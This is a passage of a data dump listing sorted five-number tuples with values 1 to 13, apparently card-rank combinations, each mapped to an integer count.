(1, 4, 5, 11, 13): 7,
(1, 4, 5, 12, 12): 3,
(1, 4, 5, 12, 13): 7,
(1, 4, 5, 13, 13): 2,
(1, 4, 6, 6, 6): 3,
(1, 4, 6, 6, 7): 4,
(1, 4, 6, 6, 8): 11,
(1, 4, 6, 6, 9): 6,
(1, 4, 6, 6, 10): 8,
(1, 4, 6, 6, 11): 6,
(1, 4, 6, 6, 12): 9,
(1, 4, 6, 6, 13): 6,
(1, 4, 6, 7, 7): 6,
(1, 4, 6, 7, 8): 9,
(1, 4, 6, 7, 9): 17,
(1, 4, 6, 7, 10): 18,
(1, 4, 6, 7, 11): 19,
(1, 4, 6, 7, 12): 19,
(1, 4, 6, 7, 13): 10,
(1, 4, 6, 8, 8): 12,
(1, 4, 6, 8, 9): 15,
(1, 4, 6, 8, 10): 18,
(1, 4, 6, 8, 11): 14,
(1, 4, 6, 8, 12): 19,
(1, 4, 6, 8, 13): 9,
(1, 4, 6, 9, 9): 7,
(1, 4, 6, 9, 10): 16,
(1, 4, 6, 9, 11): 15,
(1, 4, 6, 9, 12): 22,
(1, 4, 6, 9, 13): 11,
(1, 4, 6, 10, 10): 5,
(1, 4, 6, 10, 11): 10,
(1, 4, 6, 10, 12): 25,
(1, 4, 6, 10, 13): 9,
(1, 4, 6, 11, 11): 6,
(1, 4, 6, 11, 12): 16,
(1, 4, 6, 11, 13): 12,
(1, 4, 6, 12, 12): 17,
(1, 4, 6, 12, 13): 10,
(1, 4, 6, 13, 13): 3,
(1, 4, 7, 7, 7): 3,
(1, 4, 7, 7, 8): 11,
(1, 4, 7, 7, 9): 7,
(1, 4, 7, 7, 10): 8,
(1, 4, 7, 7, 11): 7,
(1, 4, 7, 7, 12): 7,
(1, 4, 7, 7, 13): 6,
(1, 4, 7, 8, 8): 4,
(1, 4, 7, 8, 9): 14,
(1, 4, 7, 8, 10): 21,
(1, 4, 7, 8, 11): 12,
(1, 4, 7, 8, 12): 10,
(1, 4, 7, 8, 13): 9,
(1, 4, 7, 9, 9): 8,
(1, 4, 7, 9, 10): 12,
(1, 4, 7, 9, 11): 10,
(1, 4, 7, 9, 12): 21,
(1, 4, 7, 9, 13): 5,
(1, 4, 7, 10, 10): 6,
(1, 4, 7, 10, 11): 10,
(1, 4, 7, 10, 12): 12,
(1, 4, 7, 10, 13): 13,
(1, 4, 7, 11, 11): 1,
(1, 4, 7, 11, 12): 9,
(1, 4, 7, 11, 13): 7,
(1, 4, 7, 12, 12): 7,
(1, 4, 7, 12, 13): 12,
(1, 4, 7, 13, 13): 2,
(1, 4, 8, 8, 8): 1,
(1, 4, 8, 8, 9): 3,
(1, 4, 8, 8, 10): 7,
(1, 4, 8, 8, 11): 4,
(1, 4, 8, 8, 12): 5,
(1, 4, 8, 8, 13): 5,
(1, 4, 8, 9, 9): 3,
(1, 4, 8, 9, 10): 11,
(1, 4, 8, 9, 11): 13,
(1, 4, 8, 9, 12): 6,
(1, 4, 8, 9, 13): 9,
(1, 4, 8, 10, 10): 7,
(1, 4, 8, 10, 11): 7,
(1, 4, 8, 10, 12): 22,
(1, 4, 8, 10, 13): 4,
(1, 4, 8, 11, 11): 4,
(1, 4, 8, 11, 12): 4,
(1, 4, 8, 11, 13): 9,
(1, 4, 8, 12, 12): 3,
(1, 4, 8, 12, 13): 8,
(1, 4, 8, 13, 13): 1,
(1, 4, 9, 9, 10): 3,
(1, 4, 9, 9, 11): 3,
(1, 4, 9, 9, 12): 10,
(1, 4, 9, 9, 13): 4,
(1, 4, 9, 10, 10): 1,
(1, 4, 9, 10, 11): 9,
(1, 4, 9, 10, 12): 11,
(1, 4, 9, 10, 13): 9,
(1, 4, 9, 11, 11): 4,
(1, 4, 9, 11, 12): 12,
(1, 4, 9, 11, 13): 3,
(1, 4, 9, 12, 12): 4,
(1, 4, 9, 12, 13): 5,
(1, 4, 9, 13, 13): 2,
(1, 4, 10, 10, 10): 1,
(1, 4, 10, 10, 11): 3,
(1, 4, 10, 10, 12): 7,
(1, 4, 10, 10, 13): 4,
(1, 4, 10, 11, 11): 2,
(1, 4, 10, 11, 12): 9,
(1, 4, 10, 11, 13): 9,
(1, 4, 10, 12, 12): 5,
(1, 4, 10, 12, 13): 8,
(1, 4, 10, 13, 13): 3,
(1, 4, 11, 11, 11): 1,
(1, 4, 11, 11, 12): 2,
(1, 4, 11, 11, 13): 5,
(1, 4, 11, 12, 12): 3,
(1, 4, 11, 12, 13): 8,
(1, 4, 11, 13, 13): 3,
(1, 4, 12, 12, 12): 1,
(1, 4, 12, 12, 13): 3,
(1, 4, 12, 13, 13): 5,
(1, 4, 13, 13, 13): 3,
(1, 5, 5, 5, 6): 2,
(1, 5, 5, 5, 7): 3,
(1, 5, 5, 5, 8): 4,
(1, 5, 5, 5, 9): 1,
(1, 5, 5, 5, 10): 2,
(1, 5, 5, 5, 11): 1,
(1, 5, 5, 5, 12): 1,
(1, 5, 5, 5, 13): 3,
(1, 5, 5, 6, 6): 4,
(1, 5, 5, 6, 7): 5,
(1, 5, 5, 6, 8): 7,
(1, 5, 5, 6, 9): 2,
(1, 5, 5, 6, 10): 3,
(1, 5, 5, 6, 11): 7,
(1, 5, 5, 6, 12): 13,
(1, 5, 5, 6, 13): 6,
(1, 5, 5, 7, 7): 3,
(1, 5, 5, 7, 8): 4,
(1, 5, 5, 7, 9): 7,
(1, 5, 5, 7, 10): 6,
(1, 5, 5, 7, 11): 7,
(1, 5, 5, 7, 12): 5,
(1, 5, 5, 7, 13): 4,
(1, 5, 5, 8, 8): 5,
(1, 5, 5, 8, 9): 7,
(1, 5, 5, 8, 10): 7,
(1, 5, 5, 8, 11): 4,
(1, 5, 5, 8, 12): 5,
(1, 5, 5, 8, 13): 1,
(1, 5, 5, 9, 9): 4,
(1, 5, 5, 9, 10): 8,
(1, 5, 5, 9, 11): 3,
(1, 5, 5, 9, 12): 6,
(1, 5, 5, 9, 13): 2,
(1, 5, 5, 10, 10): 2,
(1, 5, 5, 10, 11): 4,
(1, 5, 5, 10, 12): 8,
(1, 5, 5, 10, 13): 5,
(1, 5, 5, 11, 11): 3,
(1, 5, 5, 11, 12): 4,
(1, 5, 5, 11, 13): 4,
(1, 5, 5, 12, 12): 4,
(1, 5, 5, 12, 13): 1,
(1, 5, 5, 13, 13): 2,
(1, 5, 6, 6, 6): 5,
(1, 5, 6, 6, 7): 8,
(1, 5, 6, 6, 8): 3,
(1, 5, 6, 6, 9): 3,
(1, 5, 6, 6, 10): 4,
(1, 5, 6, 6, 11): 5,
(1, 5, 6, 6, 12): 9,
(1, 5, 6, 6, 13): 8,
(1, 5, 6, 7, 7): 8,
(1, 5, 6, 7, 8): 13,
(1, 5, 6, 7, 9): 4,
(1, 5, 6, 7, 10): 10,
(1, 5, 6, 7, 11): 13,
(1, 5, 6, 7, 12): 24,
(1, 5, 6, 7, 13): 11,
(1, 5, 6, 8, 8): 6,
(1, 5, 6, 8, 9): 22,
(1, 5, 6, 8, 10): 18,
(1, 5, 6, 8, 11): 9,
(1, 5, 6, 8, 12): 11,
(1, 5, 6, 8, 13): 7,
(1, 5, 6, 9, 9): 14,
(1, 5, 6, 9, 10): 13,
(1, 5, 6, 9, 11): 8,
(1, 5, 6, 9, 12): 16,
(1, 5, 6, 9, 13): 5,
(1, 5, 6, 10, 10): 7,
(1, 5, 6, 10, 11): 5,
(1, 5, 6, 10, 12): 15,
(1, 5, 6, 10, 13): 8,
(1, 5, 6, 11, 11): 2,
(1, 5, 6, 11, 12): 15,
(1, 5, 6, 11, 13): 7,
(1, 5, 6, 12, 12): 9,
(1, 5, 6, 12, 13): 14,
(1, 5, 6, 13, 13): 3,
(1, 5, 7, 7, 7): 2,
(1, 5, 7, 7, 8): 5,
(1, 5, 7, 7, 9): 8,
(1, 5, 7, 7, 10): 5,
(1, 5, 7, 7, 11): 5,
(1, 5, 7, 7, 12): 4,
(1, 5, 7, 7, 13): 7,
(1, 5, 7, 8, 8): 6,
(1, 5, 7, 8, 9): 7,
(1, 5, 7, 8, 10): 11,
(1, 5, 7, 8, 11): 7,
(1, 5, 7, 8, 12): 10,
(1, 5, 7, 8, 13): 5,
(1, 5, 7, 9, 9): 6,
(1, 5, 7, 9, 10): 12,
(1, 5, 7, 9, 11): 10,
(1, 5, 7, 9, 12): 8,
(1, 5, 7, 9, 13): 4,
(1, 5, 7, 10, 10): 6,
(1, 5, 7, 10, 11): 5,
(1, 5, 7, 10, 12): 12,
(1, 5, 7, 10, 13): 7,
(1, 5, 7, 11, 11): 4,
(1, 5, 7, 11, 12): 5,
(1, 5, 7, 11, 13): 9,
(1, 5, 7, 12, 12): 8,
(1, 5, 7, 12, 13): 5,
(1, 5, 7, 13, 13): 4,
(1, 5, 8, 8, 8): 2,
(1, 5, 8, 8, 9): 4,
(1, 5, 8, 8, 10): 5,
(1, 5, 8, 8, 11): 5,
(1, 5, 8, 8, 12): 1,
(1, 5, 8, 8, 13): 2,
(1, 5, 8, 9, 9): 4,
(1, 5, 8, 9, 10): 15,
(1, 5, 8, 9, 11): 8,
(1, 5, 8, 9, 12): 17,
(1, 5, 8, 9, 13): 3,
(1, 5, 8, 10, 10): 5,
(1, 5, 8, 10, 11): 16,
(1, 5, 8, 10, 12): 9,
(1, 5, 8, 10, 13): 9,
(1, 5, 8, 11, 11): 3,
(1, 5, 8, 11, 12): 10,
(1, 5, 8, 11, 13): 3,
(1, 5, 8, 12, 12): 5,
(1, 5, 8, 12, 13): 10,
(1, 5, 8, 13, 13): 3,
(1, 5, 9, 9, 10): 2,
(1, 5, 9, 9, 11): 7,
(1, 5, 9, 9, 12): 6,
(1, 5, 9, 9, 13): 5,
(1, 5, 9, 10, 10): 2,
(1, 5, 9, 10, 11): 5,
(1, 5, 9, 10, 12): 16,
(1, 5, 9, 10, 13): 6,
(1, 5, 9, 11, 11): 2,
(1, 5, 9, 11, 12): 6,
(1, 5, 9, 11, 13): 8,
(1, 5, 9, 12, 12): 5,
(1, 5, 9, 12, 13): 4,
(1, 5, 9, 13, 13): 2,
(1, 5, 10, 10, 10): 1,
(1, 5, 10, 10, 11): 3,
(1, 5, 10, 10, 12): 3,
(1, 5, 10, 10, 13): 5,
(1, 5, 10, 11, 11): 2,
(1, 5, 10, 11, 12): 4,
(1, 5, 10, 11, 13): 5,
(1, 5, 10, 12, 12): 3,
(1, 5, 10, 12, 13): 6,
(1, 5, 10, 13, 13): 3,
(1, 5, 11, 11, 12): 1,
(1, 5, 11, 11, 13): 3,
(1, 5, 11, 12, 12): 2,
(1, 5, 11, 12, 13): 7,
(1, 5, 11, 13, 13): 4,
(1, 5, 12, 12, 12): 1,
(1, 5, 12, 12, 13): 4,
(1, 5, 12, 13, 13): 1,
(1, 6, 6, 6, 6): 1,
(1, 6, 6, 6, 7): 2,
(1, 6, 6, 6, 8): 1,
(1, 6, 6, 6, 9): 1,
(1, 6, 6, 6, 10): 1,
(1, 6, 6, 6, 11): 2,
(1, 6, 6, 6, 12): 2,
(1, 6, 6, 6, 13): 3,
(1, 6, 6, 7, 7): 1,
(1, 6, 6, 7, 8): 8,
(1, 6, 6, 7, 9): 6,
(1, 6, 6, 7, 10): 1,
(1, 6, 6, 7, 11): 5,
(1, 6, 6, 7, 12): 13,
(1, 6, 6, 7, 13): 12,
(1, 6, 6, 8, 8): 5,
(1, 6, 6, 8, 9): 9,
(1, 6, 6, 8, 10): 4,
(1, 6, 6, 8, 11): 2,
(1, 6, 6, 8, 12): 11,
(1, 6, 6, 8, 13): 7,
(1, 6, 6, 9, 9): 5,
(1, 6, 6, 9, 10): 5,
(1, 6, 6, 9, 11): 4,
(1, 6, 6, 9, 12): 9,
(1, 6, 6, 9, 13): 3,
(1, 6, 6, 10, 10): 2,
(1, 6, 6, 10, 11): 4,
(1, 6, 6, 10, 12): 8,
(1, 6, 6, 10, 13): 2,
(1, 6, 6, 11, 11): 2,
(1, 6, 6, 11, 12): 4,
(1, 6, 6, 11, 13): 4,
(1, 6, 6, 12, 12): 6,
(1, 6, 6, 12, 13): 4,
(1, 6, 6, 13, 13): 3,
(1, 6, 7, 7, 7): 2,
(1, 6, 7, 7, 8): 9,
(1, 6, 7, 7, 9): 4,
(1, 6, 7, 7, 10): 3,
(1, 6, 7, 7, 11): 1,
(1, 6, 7, 7, 12): 10,
(1, 6, 7, 7, 13): 12,
(1, 6, 7, 8, 8): 4,
(1, 6, 7, 8, 9): 11,
(1, 6, 7, 8, 10): 4,
(1, 6, 7, 8, 11): 8,
(1, 6, 7, 8, 12): 11,
(1, 6, 7, 8, 13): 13,
(1, 6, 7, 9, 9): 2,
(1, 6, 7, 9, 10): 10,
(1, 6, 7, 9, 11): 3,
(1, 6, 7, 9, 12): 16,
(1, 6, 7, 9, 13): 5,
(1, 6, 7, 10, 10): 4,
(1, 6, 7, 10, 11): 8,
(1, 6, 7, 10, 12): 10,
(1, 6, 7, 10, 13): 4,
(1, 6, 7, 11, 11): 4,
(1, 6, 7, 11, 12): 10,
(1, 6, 7, 11, 13): 4,
(1, 6, 7, 12, 12): 5,
(1, 6, 7, 12, 13): 10,
(1, 6, 7, 13, 13): 3,
(1, 6, 8, 8, 8): 2,
(1, 6, 8, 8, 9): 3,
(1, 6, 8, 8, 10): 7,
(1, 6, 8, 8, 11): 1,
(1, 6, 8, 8, 12): 8,
(1, 6, 8, 8, 13): 3,
(1, 6, 8, 9, 9): 3,
(1, 6, 8, 9, 10): 7,
(1, 6, 8, 9, 11): 17,
(1, 6, 8, 9, 12): 12,
(1, 6, 8, 9, 13): 9,
(1, 6, 8, 10, 10): 6,
(1, 6, 8, 10, 11): 7,
(1, 6, 8, 10, 12): 20,
(1, 6, 8, 10, 13): 6,
(1, 6, 8, 11, 11): 4,
(1, 6, 8, 11, 12): 6,
(1, 6, 8, 11, 13): 9,
(1, 6, 8, 12, 12): 9,
(1, 6, 8, 12, 13): 6,
(1, 6, 8, 13, 13): 5,
(1, 6, 9, 9, 9): 2,
(1, 6, 9, 9, 10): 4,
(1, 6, 9, 9, 11): 6,
(1, 6, 9, 9, 12): 13,
(1, 6, 9, 9, 13): 5,
(1, 6, 9, 10, 10): 3,
(1, 6, 9, 10, 11): 8,
(1, 6, 9, 10, 12): 9,
(1, 6, 9, 10, 13): 10,
(1, 6, 9, 11, 11): 3,
(1, 6, 9, 11, 12): 12,
(1, 6, 9, 11, 13): 5,
(1, 6, 9, 12, 12): 12,
(1, 6, 9, 12, 13): 12,
(1, 6, 9, 13, 13): 3,
(1, 6, 10, 10, 11): 1,
(1, 6, 10, 10, 12): 6,
(1, 6, 10, 10, 13): 2,
(1, 6, 10, 11, 11): 1,
(1, 6, 10, 11, 12): 3,
(1, 6, 10, 11, 13): 11,
(1, 6, 10, 12, 12): 10,
(1, 6, 10, 12, 13): 7,
(1, 6, 10, 13, 13): 6,
(1, 6, 11, 11, 12): 4,
(1, 6, 11, 11, 13): 4,
(1, 6, 11, 12, 12): 2,
(1, 6, 11, 12, 13): 10,
(1, 6, 11, 13, 13): 2,
(1, 6, 12, 12, 12): 2,
(1, 6, 12, 12, 13): 1,
(1, 7, 7, 7, 7): 1,
(1, 7, 7, 7, 8): 4,
(1, 7, 7, 7, 9): 3,
(1, 7, 7, 7, 10): 1,
(1, 7, 7, 7, 11): 2,
(1, 7, 7, 7, 12): 3,
(1, 7, 7, 7, 13): 3,
(1, 7, 7, 8, 8): 4,
(1, 7, 7, 8, 9): 1,
(1, 7, 7, 8, 10): 4,
(1, 7, 7, 8, 11): 1,
(1, 7, 7, 8, 12): 7,
(1, 7, 7, 8, 13): 7,
(1, 7, 7, 9, 9): 1,
(1, 7, 7, 9, 10): 3,
(1, 7, 7, 9, 11): 5,
(1, 7, 7, 9, 12): 5,
(1, 7, 7, 9, 13): 5,
(1, 7, 7, 10, 10): 1,
(1, 7, 7, 10, 11): 5,
(1, 7, 7, 10, 12): 7,
(1, 7, 7, 10, 13): 1,
(1, 7, 7, 11, 11): 1,
(1, 7, 7, 11, 12): 2,
(1, 7, 7, 11, 13): 5,
(1, 7, 7, 12, 12): 3,
(1, 7, 7, 12, 13): 2,
(1, 7, 7, 13, 13): 3,
(1, 7, 8, 8, 8): 2,
(1, 7, 8, 8, 9): 3,
(1, 7, 8, 8, 10): 1,
(1, 7, 8, 8, 11): 2,
(1, 7, 8, 8, 12): 2,
(1, 7, 8, 8, 13): 5,
(1, 7, 8, 9, 9): 2,
(1, 7, 8, 9, 10): 5,
(1, 7, 8, 9, 11): 4,
(1, 7, 8, 9, 12): 14,
(1, 7, 8, 9, 13): 6,
(1, 7, 8, 10, 10): 6,
(1, 7, 8, 10, 11): 9,
(1, 7, 8, 10, 12): 8,
(1, 7, 8, 10, 13): 9,
(1, 7, 8, 11, 11): 4,
(1, 7, 8, 11, 12): 6,
(1, 7, 8, 11, 13): 1,
(1, 7, 8, 12, 12): 4,
(1, 7, 8, 12, 13): 10,
(1, 7, 8, 13, 13): 4,
(1, 7, 9, 9, 10): 2,
(1, 7, 9, 9, 11): 5,
(1, 7, 9, 9, 12): 6,
(1, 7, 9, 9, 13): 4,
(1, 7, 9, 10, 10): 3,
(1, 7, 9, 10, 11): 6,
(1, 7, 9, 10, 12): 12,
(1, 7, 9, 10, 13): 3,
(1, 7, 9, 11, 11): 4,
(1, 7, 9, 11, 12): 5,
(1, 7, 9, 11, 13): 6,
(1, 7, 9, 12, 12): 5,
(1, 7, 9, 12, 13): 5,
(1, 7, 9, 13, 13): 4,
(1, 7, 10, 10, 11): 4,
(1, 7, 10, 10, 12): 3,
(1, 7, 10, 10, 13): 4,
(1, 7, 10, 11, 12): 9,
(1, 7, 10, 11, 13): 6,
(1, 7, 10, 12, 12): 2,
(1, 7, 10, 12, 13): 10,
(1, 7, 10, 13, 13): 1,
(1, 7, 11, 11, 12): 2,
(1, 7, 11, 11, 13): 6,
(1, 7, 11, 12, 12): 5,
(1, 7, 11, 12, 13): 5,
(1, 7, 11, 13, 13): 4,
(1, 7, 12, 12, 12): 2,
(1, 7, 12, 12, 13): 2,
(1, 7, 12, 13, 13): 1,
(1, 8, 8, 8, 10): 1,
(1, 8, 8, 8, 12): 1,
(1, 8, 8, 8, 13): 2,
(1, 8, 8, 9, 11): 1,
(1, 8, 8, 9, 12): 4,
(1, 8, 8, 9, 13): 4,
(1, 8, 8, 10, 10): 1,
(1, 8, 8, 10, 11): 3,
(1, 8, 8, 10, 12): 6,
(1, 8, 8, 10, 13): 4,
(1, 8, 8, 11, 11): 2,
(1, 8, 8, 11, 12): 2,
(1, 8, 8, 11, 13): 3,
(1, 8, 8, 12, 12): 1,
(1, 8, 8, 12, 13): 2,
(1, 8, 8, 13, 13): 2,
(1, 8, 9, 9, 11): 1,
(1, 8, 9, 9, 12): 3,
(1, 8, 9, 9, 13): 3,
(1, 8, 9, 10, 11): 5,
(1, 8, 9, 10, 12): 7,
(1, 8, 9, 10, 13): 6,
(1, 8, 9, 11, 11): 3,
(1, 8, 9, 11, 12): 9,
(1, 8, 9, 11, 13): 5,
(1, 8, 9, 12, 12): 2,
(1, 8, 9, 12, 13): 4,
(1, 8, 9, 13, 13): 1,
(1, 8, 10, 10, 10): 1,
(1, 8, 10, 10, 11): 1,
(1, 8, 10, 10, 12): 4,
(1, 8, 10, 10, 13): 5,
(1, 8, 10, 11, 11): 5,
(1, 8, 10, 11, 12): 7,
(1, 8, 10, 11, 13): 8,
(1, 8, 10, 12, 12): 6,
(1, 8, 10, 12, 13): 4,
(1, 8, 10, 13, 13): 3,
(1, 8, 11, 11, 11): 1,
(1, 8, 11, 11, 12): 2,
(1, 8, 11, 11, 13): 3,
(1, 8, 11, 12, 12): 1,
(1, 8, 11, 12, 13): 6,
(1, 8, 11, 13, 13): 3,
(1, 8, 12, 12, 12): 1,
(1, 8, 12, 12, 13): 3,
(1, 8, 12, 13, 13): 3,
(1, 8, 13, 13, 13): 1,
(1, 9, 9, 9, 12): 1,
(1, 9, 9, 10, 11): 1,
(1, 9, 9, 10, 12): 2,
(1, 9, 9, 10, 13): 2,
(1, 9, 9, 11, 11): 2,
(1, 9, 9, 11, 12): 6,
(1, 9, 9, 11, 13): 3,
(1, 9, 9, 12, 12): 4,
(1, 9, 9, 12, 13): 2,
(1, 9, 9, 13, 13): 1,
(1, 9, 10, 10, 11): 2,
(1, 9, 10, 10, 12): 3,
(1, 9, 10, 10, 13): 2,
(1, 9, 10, 11, 11): 4,
(1, 9, 10, 11, 12): 10,
(1, 9, 10, 11, 13): 7,
(1, 9, 10, 12, 12): 6,
(1, 9, 10, 12, 13): 11,
(1, 9, 10, 13, 13): 2,
(1, 9, 11, 11, 11): 2,
(1, 9, 11, 11, 12): 3,
(1, 9, 11, 11, 13): 2,
(1, 9, 11, 12, 12): 3,
(1, 9, 11, 12, 13): 3,
(1, 9, 11, 13, 13): 3,
(1, 9, 12, 12, 12): 1,
(1, 9, 12, 12, 13): 1,
(1, 9, 12, 13, 13): 2,
(1, 9, 13, 13, 13): 1,
(1, 10, 10, 10, 11): 2,
(1, 10, 10, 10, 12): 2,
(1, 10, 10, 10, 13): 1,
(1, 10, 10, 11, 11): 2,
(1, 10, 10, 11, 12): 4,
(1, 10, 10, 11, 13): 5,
(1, 10, 10, 12, 12): 2,
(1, 10, 10, 12, 13): 2,
(1, 10, 10, 13, 13): 2,
(1, 10, 11, 11, 11): 2,
(1, 10, 11, 11, 12): 2,
(1, 10, 11, 11, 13): 1,
(1, 10, 11, 12, 12): 1,
(1, 10, 11, 12, 13): 5,
(1, 10, 11, 13, 13): 2,
(1, 10, 12, 12, 13): 1,
(1, 11, 11, 11, 13): 1,
(2, 2, 2, 2, 5): 4,
(2, 2, 2, 2, 7): 3,
(2, 2, 2, 2, 8): 2,
(2, 2, 2, 2, 9): 5,
(2, 2, 2, 2, 10): 2,
(2, 2, 2, 2, 11): 2,
(2, 2, 2, 2, 12): 4,
(2, 2, 2, 2, 13): 4,
(2, 2, 2, 3, 3): 4,
(2, 2, 2, 3, 4): 8,
(2, 2, 2, 3, 5): 3,
(2, 2, 2, 3, 6): 10,
(2, 2, 2, 3, 7): 7,
(2, 2, 2, 3, 8): 10,
(2, 2, 2, 3, 9): 9,
(2, 2, 2, 3, 10): 10,
(2, 2, 2, 3, 11): 9,
(2, 2, 2, 3, 12): 12,
(2, 2, 2, 3, 13): 8,
(2, 2, 2, 4, 4): 1,
(2, 2, 2, 4, 5): 7,
(2, 2, 2, 4, 6): 9,
(2, 2, 2, 4, 7): 12,
(2, 2, 2, 4, 8): 3,
(2, 2, 2, 4, 9): 8,
(2, 2, 2, 4, 10): 18,
(2, 2, 2, 4, 11): 19,
(2, 2, 2, 4, 12): 13,
(2, 2, 2, 4, 13): 8,
(2, 2, 2, 5, 5): 6,
(2, 2, 2, 5, 6): 8,
(2, 2, 2, 5, 7): 8,
(2, 2, 2, 5, 8): 8,
(2, 2, 2, 5, 9): 7,
(2, 2, 2, 5, 10): 10,
(2, 2, 2, 5, 11): 5,
(2, 2, 2, 5, 12): 13,
(2, 2, 2, 5, 13): 6,
(2, 2, 2, 6, 6): 10,
(2, 2, 2, 6, 7): 10,
(2, 2, 2, 6, 8): 15,
(2, 2, 2, 6, 9): 9,
(2, 2, 2, 6, 10): 10,
(2, 2, 2, 6, 11): 8,
(2, 2, 2, 6, 12): 9,
(2, 2, 2, 6, 13): 12,
(2, 2, 2, 7, 7): 9,
(2, 2, 2, 7, 8): 8,
(2, 2, 2, 7, 9): 4,
(2, 2, 2, 7, 10): 7,
(2, 2, 2, 7, 11): 3,
(2, 2, 2, 7, 12): 12,
(2, 2, 2, 7, 13): 4,
(2, 2, 2, 8, 8): 4,
(2, 2, 2, 8, 9): 9,
(2, 2, 2, 8, 10): 7,
(2, 2, 2, 8, 11): 10,
(2, 2, 2, 8, 12): 10,
(2, 2, 2, 8, 13): 10,
(2, 2, 2, 9, 9): 1,
(2, 2, 2, 9, 10): 7,
(2, 2, 2, 9, 11): 3,
(2, 2, 2, 9, 12): 9,
(2, 2, 2, 9, 13): 3,
(2, 2, 2, 10, 10): 6,
(2, 2, 2, 10, 11): 7,
(2, 2, 2, 10, 12): 9,
(2, 2, 2, 10, 13): 4,
(2, 2, 2, 11, 11): 3,
(2, 2, 2, 11, 12): 7,
(2, 2, 2, 11, 13): 1,
(2, 2, 2, 12, 12): 6,
(2, 2, 2, 12, 13): 7,
(2, 2, 3, 3, 3): 5,
(2, 2, 3, 3, 4): 7,
(2, 2, 3, 3, 5): 6,
(2, 2, 3, 3, 6): 16,
(2, 2, 3, 3, 7): 9,
(2, 2, 3, 3, 8): 7,
(2, 2, 3, 3, 9): 12,
(2, 2, 3, 3, 10): 11,
(2, 2, 3, 3, 11): 11,
(2, 2, 3, 3, 12): 18,
(2, 2, 3, 3, 13): 6,
(2, 2, 3, 4, 4): 9,
(2, 2, 3, 4, 5): 15,
(2, 2, 3, 4, 6): 24,
(2, 2, 3, 4, 7): 18,
(2, 2, 3, 4, 8): 25,
(2, 2, 3, 4, 9): 15,
(2, 2, 3, 4, 10): 26,
(2, 2, 3, 4, 11): 20,
(2, 2, 3, 4, 12): 23,
(2, 2, 3, 4, 13): 16,
(2, 2, 3, 5, 5): 8,
(2, 2, 3, 5, 6): 19,
(2, 2, 3, 5, 7): 20,
(2, 2, 3, 5, 8): 17,
(2, 2, 3, 5, 9): 11,
(2, 2, 3, 5, 10): 20,
(2, 2, 3, 5, 11): 15,
(2, 2, 3, 5, 12): 15,
(2, 2, 3, 5, 13): 13,
(2, 2, 3, 6, 6): 22,
(2, 2, 3, 6, 7): 21,
(2, 2, 3, 6, 8): 21,
(2, 2, 3, 6, 9): 36,
(2, 2, 3, 6, 10): 22,
(2, 2, 3, 6, 11): 20,
(2, 2, 3, 6, 12): 37,
(2, 2, 3, 6, 13): 17,
(2, 2, 3, 7, 7): 12,
(2, 2, 3, 7, 8): 19,
(2, 2, 3, 7, 9): 14,
(2, 2, 3, 7, 10): 14,
(2, 2, 3, 7, 11): 15,
(2, 2, 3, 7, 12): 17,
(2, 2, 3, 7, 13): 21,
(2, 2, 3, 8, 8): 12,
(2, 2, 3, 8, 9): 18,
(2, 2, 3, 8, 10): 21,
(2, 2, 3, 8, 11): 12,
(2, 2, 3, 8, 12): 23,
(2, 2, 3, 8, 13): 14,
(2, 2, 3, 9, 9): 13,
(2, 2, 3, 9, 10): 14,
(2, 2, 3, 9, 11): 13,
(2, 2, 3, 9, 12): 24,
(2, 2, 3, 9, 13): 8,
(2, 2, 3, 10, 10): 13,
(2, 2, 3, 10, 11): 18,
(2, 2, 3, 10, 12): 15,
(2, 2, 3, 10, 13): 15,
(2, 2, 3, 11, 11): 4,
(2, 2, 3, 11, 12): 13,
(2, 2, 3, 11, 13): 10,
(2, 2, 3, 12, 12): 12,
(2, 2, 3, 12, 13): 13,
(2, 2, 3, 13, 13): 6,
(2, 2, 4, 4, 4): 2,
(2, 2, 4, 4, 5): 14,
(2, 2, 4, 4, 6): 12,
(2, 2, 4, 4, 7): 12,
(2, 2, 4, 4, 8): 7,
(2, 2, 4, 4, 9): 13,
(2, 2, 4, 4, 10): 13,
(2, 2, 4, 4, 11): 11,
(2, 2, 4, 4, 12): 11,
(2, 2, 4, 4, 13): 14,
(2, 2, 4, 5, 5): 6,
(2, 2, 4, 5, 6): 22,
(2, 2, 4, 5, 7): 18,
(2, 2, 4, 5, 8): 25,
(2, 2, 4, 5, 9): 18,
(2, 2, 4, 5, 10): 20,
(2, 2, 4, 5, 11): 10,
(2, 2, 4, 5, 12): 28,
(2, 2, 4, 5, 13): 11,
(2, 2, 4, 6, 6): 14,
(2, 2, 4, 6, 7): 21,
(2, 2, 4, 6, 8): 32,
(2, 2, 4, 6, 9): 23,
(2, 2, 4, 6, 10): 33,
(2, 2, 4, 6, 11): 27,
(2, 2, 4, 6, 12): 33,
(2, 2, 4, 6, 13): 28,
(2, 2, 4, 7, 7): 15,
(2, 2, 4, 7, 8): 24,
(2, 2, 4, 7, 9): 17,
(2, 2, 4, 7, 10): 25,
(2, 2, 4, 7, 11): 13,
(2, 2, 4, 7, 12): 24,
(2, 2, 4, 7, 13): 13,
(2, 2, 4, 8, 8): 5,
(2, 2, 4, 8, 9): 20,
(2, 2, 4, 8, 10): 33,
(2, 2, 4, 8, 11): 30,
(2, 2, 4, 8, 12): 19,
(2, 2, 4, 8, 13): 19,
(2, 2, 4, 9, 9): 2,
(2, 2, 4, 9, 10): 22,
(2, 2, 4, 9, 11): 12,
(2, 2, 4, 9, 12): 21,
(2, 2, 4, 9, 13): 9,
(2, 2, 4, 10, 10): 12,
(2, 2, 4, 10, 11): 17,
(2, 2, 4, 10, 12): 34,
(2, 2, 4, 10, 13): 15,
(2, 2, 4, 11, 11): 5,
(2, 2, 4, 11, 12): 20,
(2, 2, 4, 11, 13): 6,
(2, 2, 4, 12, 12): 10,
(2, 2, 4, 12, 13): 12,
(2, 2, 4, 13, 13): 5,
(2, 2, 5, 5, 5): 3,
(2, 2, 5, 5, 6): 9,
(2, 2, 5, 5, 7): 9,
(2, 2, 5, 5, 8): 7,
(2, 2, 5, 5, 9): 5,
(2, 2, 5, 5, 10): 6,
(2, 2, 5, 5, 11): 7,
(2, 2, 5, 5, 12): 9,
(2, 2, 5, 5, 13): 8,
(2, 2, 5, 6, 6): 15,
(2, 2, 5, 6, 7): 20,
(2, 2, 5, 6, 8): 33,
(2, 2, 5, 6, 9): 9,
(2, 2, 5, 6, 10): 15,
(2, 2, 5, 6, 11): 16,
(2, 2, 5, 6, 12): 17,
(2, 2, 5, 6, 13): 18,
(2, 2, 5, 7, 7): 10,
(2, 2, 5, 7, 8): 13,
(2, 2, 5, 7, 9): 18,
(2, 2, 5, 7, 10): 16,
(2, 2, 5, 7, 11): 17,
